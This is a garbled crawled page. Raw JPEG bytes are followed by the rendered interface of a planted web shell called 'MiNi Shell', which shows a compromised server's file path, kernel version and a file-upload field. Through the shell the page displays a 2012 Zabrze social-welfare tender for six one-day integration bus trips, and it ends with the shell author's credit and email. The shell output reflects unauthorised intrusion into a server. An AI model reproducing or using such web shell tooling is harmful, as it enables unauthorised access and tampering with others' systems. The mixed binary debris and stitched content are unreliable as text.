JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120315/60217-N-2012.html

<p class="kh_header"><b>Zabrze: ORGANIZACJA SZEŚCIU JEDNODNIOWYCH WYJAZDÓW INTEGRACYJNYCH O CHARAKTERZE TURYSTYCZNO-KULTURALNYM DLA UCZESTNIKÓW PROJEKTU WSPÓŁFINANSOWANEGO PRZEZ UNIĘ EUROPEJSKĄ ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO PT. REINTEGRACJA, AKTYWNOŚĆ, PRACA. PROGRAM NA RZECZ INTEGRACJI SPOŁECZNO ZAWODOWEJ W GMINIE ZABRZE.</b><br>
<b>Numer ogłoszenia: 60217 - 2012; data zamieszczenia: 15.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie , ul. Roosevelta 40, 41-800 Zabrze, woj. śląskie, tel. 032 2777800, faks 032 2777802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.zabrze.magistrat.pl, www.mopr.zabrze.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.mopr.zabrze.magistrat.pl, www.mopr.zabrze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ORGANIZACJA SZEŚCIU JEDNODNIOWYCH WYJAZDÓW INTEGRACYJNYCH O CHARAKTERZE TURYSTYCZNO-KULTURALNYM DLA UCZESTNIKÓW PROJEKTU WSPÓŁFINANSOWANEGO PRZEZ UNIĘ EUROPEJSKĄ ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO PT. REINTEGRACJA, AKTYWNOŚĆ, PRACA. PROGRAM NA RZECZ INTEGRACJI SPOŁECZNO ZAWODOWEJ W GMINIE ZABRZE..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa zorganizowania sześciu jednodniowych wyjazdów integracyjnych 
o charakterze turystyczno-kulturalnym dla uczestników projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno zawodowej w gminie Zabrze wg załącznika nr 1 do SIWZ (szczegółowy opis przedmiotu zamówienia)
Jednodniowe wyjazdy integracyjne odbędą się w dniach:
I termin - 12 kwiecień 2012 r.  (czwartek)* w godzinach od 5.30 do 21.30.
II termin - 17 maj 2012 r.  (czwartek)* w godzinach od 8.00 do 19.00.
III termin - 12 czerwiec 2012 r.  (wtorek)* w godzinach od 5.30 do 21.30.
IV termin - 12 lipiec 2012 r. (czwartek)* w godzinach od 8.00 do 19.00.
V termin - 23 sierpień 2012 r. (czwartek)* w godzinach od 8.00 do 19.00.
VI termin - 02 październik 2012 r. (wtorek)* w godzinach od 6.30 do 20.15. 
*W/w terminy Zamawiający określa jako preferencyjne. W nieprzewidzianych przez Zamawiającego okolicznościach w tym niezapewnieniu przez Zamawiającego określonej ilości osób dopuszcza się zmianę terminu realizacji zamówienia za zgodą obu stron. 
Na każdy jednodniowy wyjazd musi składać się m. in. transport autokarem wraz z ubezpieczeniem od następstw nieszczęśliwych wypadków dla każdego uczestnika i opiekunów, wszystkie opłaty drogowe 
i parkingowe obejmujące całą trasę wycieczki, bilety wstępu, opieką przewodnika (przy zaznaczonych wyjazdach opieka dwóch przewodników). Wykonawca zapewni również wyżywienie dla uczestników wyjazdu w postaci posiłku obiadowego zgodnie z rozpiską zawartą w załączniku nr 1 do SIWZ. 
Zamówienie obejmuje wyjazd ze wskazanego przez zamawiającego miejsca w godzinach ustalonych przez Zamawiającego (orientacyjne godziny wyjazdu podane w załączniku nr 1 do SIWZ), zwiedzanie wybranych atrakcji pod opieką przewodnika, obiad w lokalu restauracyjnym dla wszystkich uczestników wyjazdów, powrót do Zabrza na miejsce wyznaczone przez Zamawiającego  oraz orientacyjnie podaną godzinę powrotu (załącznik nr 1 do SIWZ).
Autokar musi być przystosowany do przewozu co najmniej 45 osób w przypadku takiej liczby uczestników. Wykonawca zapewni podstawienie autokaru lub innego odpowiedniego środka transportu dostosowanego do ilości osób w trakcie jednego wyjazdu na wybrany przez Zamawiającego parking na co najmniej 15 minut przed planowanym wyjazdem. Zamawiający zaznacza, iż zastrzega sobie prawo do wezwania odpowiednich służb w celu kontroli stanu technicznego pojazdu i trzeźwości kierowcy. W przypadku awarii pojazdu Wykonawca zobowiązany będzie we własnym zakresie zapewnić sprawny pojazd zastępczy w celu ciągłości świadczenia usług będących przedmiotem umowy.
Wykonawca zobowiązany jest sporządzić i przekazać Zamawiającemu szczegółowy program wyjazdu  na co najmniej 3 dni przed terminem uwzględniając planowany czas od godziny wyjazdu z centrum Zabrza do godz. przyjazdu do centrum Zabrza. Ilość uczestników każdego wyjazdu zostanie ustalona przez Zamawiającego i przekazana Wykonawcy telefonicznie bądź mailowo w terminie nie krótszym niż 7 dni przed dniem planowanego wyjazdu.  
Przewidziana ilość uczestników: łącznie na sześć jednodniowych wyjazdów przewidziano ilość minimum 220 osób, maksimum 335 uczestników projektu oraz dodatkowo po 2 opiekunów grupy na każdy wyjazd. W cenie należy uwzględnić koszt opiekunów ze strony Zamawiającego. W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się zorganizowanie wyjazdu dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby przewidzianych osób maksymalnie o 10% w stosunku do minimalnej liczby uczestników. 
Wykonawca zobowiązany jest do zapewnienia pojazdu dopuszczonego do ruchu zgodnie z obowiązującym na terenie Rzeczpospolitej Polskiej prawem tj. na dzień rozpoczęcia usługi pojazd musi posiadać aktualne badania techniczne dopuszczające do ruchu. 
Łączna kwota zamówienia musi obejmować m.in. cenę transportu wraz z ubezpieczeniem od następstw nieszczęśliwych wypadków każdego uczestnika, wszystkie opłaty drogowe i parkingowe obejmujące całą trasę wycieczki, zwiedzanie miejscowych atrakcji, opiekę przewodnika (w wybranych wycieczkach konieczne jest zapewnienie opieki 2 przewodników). Wykonawca zapewni również wyżywienie dla uczestników wyjazdu w postaci posiłku obiadowego.
Zamawiający zastrzega sobie prawo unieważnienia umowy w sprawie zamówienia publicznego, jeżeli środki pochodzące z budżetu Unii Europejskiej, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały mu przyznane.
Wystąpienie kosztów związanych z ewentualną zmianą programu, przedłużeniem czasu trwania wyjazdu i innych nie przewidzianych okoliczności nie powoduje zwiększenia wynagrodzenia Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 63.51.10.00-4, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NA PODSTAWIE OŚWIADCZEŃ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NA PODSTAWIE OŚWIADCZEŃ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NA PODSTAWIE OŚWIADCZEŃ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NA PODSTAWIE OŚWIADCZEŃ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NA PODSTAWIE OŚWIADCZEŃ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>PARAFOWANY WZÓR UMOWY (ZAŁĄCZNIK NR 7), WPIS DO REJESTRU ORGANIZATORÓW TURYSTYKI I POŚREDNIKÓW TURYSTYCZNYCH.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- zmiana osób funkcyjnych - z przyczyn niezależnych od Zamawiającego i Wykonawcy
- zmiana sposobu reprezentacji - z przyczyn niezależnych od Zamawiającego i Wykonawcy
- zmiana adresu siedziby jednej ze stron - z przyczyn zewnętrznych
- zmiana terminu realizacji zamówienia - na podstawie obiektywnych przesłanek zaakceptowanych  
  przez Zamawiającego
- wprowadzenie lub zmiana podwykonawcy - w uzasadnionych przypadkach, za pisemną zgodą Zamawiającego
- zmiany ilości uczestników - prawo zmniejszenia liczby przewidzianych osób na 1 wyjazd lub w stosunku do całości zamówienia maksymalnie o 10% w stosunku do minimalnej liczby uczestników.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.zabrze.pl www.mopr.zabrze.magistrat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MIEJSKI OŚRODEK POMOCY RODZINIE W ZABRZU UL. ROOSEVELTA 40 41-800 ZABRZE POKÓJ 216 II PIĘTRO.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2012 godzina 09:00, miejsce: MIEJSKI OŚRODEK POMOCY RODZINIE W ZABRZU UL. ROOSEVELTA 40 41-800 ZABRZE POKÓJ 117 I PIĘTRO.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT WSPÓŁFINANSOWANY PRZEZ UNIĘ EUROPEJSKĄ ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO PT. REINTEGRACJA, AKTYWNOŚĆ, PRACA. PROGRAM NA RZECZ INTEGRACJI SPOŁECZNO ZAWODOWEJ W GMINIE ZABRZE..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com